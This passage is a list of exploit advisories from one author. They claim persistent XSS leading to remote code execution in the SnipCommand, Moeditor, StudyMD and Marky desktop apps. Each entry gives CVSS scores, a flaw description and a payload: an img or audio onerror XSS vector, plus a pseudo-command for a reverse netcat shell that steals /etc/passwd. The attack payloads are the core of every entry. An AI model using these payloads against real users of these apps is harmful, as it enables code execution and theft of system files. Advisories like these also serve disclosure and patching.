Payload <img src=x onerror=writeln(String.fromCharCode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
  22. # Exploit Title: SnipCommand 0.1.0 - XSS to RCE # Exploit Author: TaurusOmar # Date: 04/05/2021 # CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H # Risk: High (8.8) # Vendor Homepage: https://github.com/gurayyarar/SnipCommand # Version: 0.1.0 # Tested on: Windows, Linux, MacOs # Software Description: Open source command snippets manager for organize and copy fast. It helps you create, organize and store your commands (Excel formulas, Sql Queries, Terminal commands, etc.) with dynamic parameters for quick copy to it. Describe your commands with dynamic parameters also support documentation about your snippets. You can select or specify your dynamic values using with selectbox/inputbox for ready to paste the workspace. You can organize with tags. # Vulnerability Description: The software allows you to store payloads in the form of files or as titles in their dynamic values, once the malicious code is entered, the payload will be executed immediately. The attacker can send a malicious file with the payload, when this file is opened, the chain will be executed successfully giving access to the the remote attacker to get remote execution on the computer. #Proof video https://imgur.com/a/I2reH1M # Payload: exec(Attacker Reverse netcat stolen => /etc/passwd) && exec(calc) <audio src=x onerror=writeln(String.fromCharCode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
  23. # Exploit Title: Moeditor 0.2.0 - Persistent Cross-Site Scripting # Exploit Author: TaurusOmar # Date: 04/05/2021 # CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H # Risk: High (8.8) # Vendor Homepage: https://moeditor.js.org/ # Version: 0.2.0 # Tested on: Windows, Linux, MacOs # Software Description: Software to view and edit sales documentation Moeditor shows the md files in its editor allows to carry out projects easily, you can open your own files or share with other users # Vulnerability Description: The software allows you to store payloads within its own editor, as well as upload (.md) files once malicious code is entered, the payload will be executed immediately. The attacker can send a malicious file with the payload, when this file is opened, the chain will be executed successfully giving access to the remote attacker to get remote execution on the computer. #Proof video https://imgur.com/a/UdP4JaX # Payload : exec(Attacker Reverse netcat stolen => /etc/passwd) && exec(calc) [<audio src=x onerror=writeln(String.fromCharCode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http://)
  24. # Exploit Title: StudyMD 0.3.2 - Persistent Cross-Site Scripting # Exploit Author: TaurusOmar # Date: 04/05/2021 # CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H # Risk: High (8.8) # Vendor Homepage: https://github.com/jotron/StudyMD # Version: 0.3.2 # Tested on: Windows, Linux, MacOs # Software Description: A cool app to study with markdown. Turns your Markdown-Summaries to Flashcard. Allows user to create flash cards based on markdown files (.md) for easy viewing of their structure. # Vulnerability Description: The software allows you to store payloads within your flash card manager, as well as upload files (.md) once the malicious code is entered, the payload will be executed immediately. The attacker can send a malicious file with the payload, when this file is opened, the chain will be executed successfully giving access to the the remote attacker to get remote execution on the computer. #Proof Video https://imgur.com/a/lDHKEIp # Payload: exec(AttackerReverse netcat stolen => /etc/passwd) && exec(calc) [<audio src=x onerror=writeln(String.fromCharCode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http://)
  25. # Exploit Title: Marky 0.0.1 - Persistent Cross-Site Scripting # Exploit Author: TaurusOmar # Date: 04/05/2021 # CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H # Risk: High (8.8) # Vendor Homepage: https://github.com/vesparny/marky # Version: 0.0.1 # Tested on: Linux, MacOs, Windows # Software Description: Marky is an editor for markdown with a friendly interface that allows you to view, edit and load files (.md). Marky is still under development. You can download the latest version from the releases page. # Vulnerability Description: The software allows you to store payloads within its own editor, as well as upload (.md) files once malicious code is entered, the payload will be executed immediately. The attacker can send a malicious file with the payload, when this file is opened, the chain will be executed successfully giving access to the remote attacker to get remote execution on the computer. #Proof Video https://imgur.com/a/qclfrUx # Payload : exec(Attacker Reverse netcat stolen => /etc/passwd) && exec(calc) [<audio src=x onerror=writeln(String.fromCharCode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http://)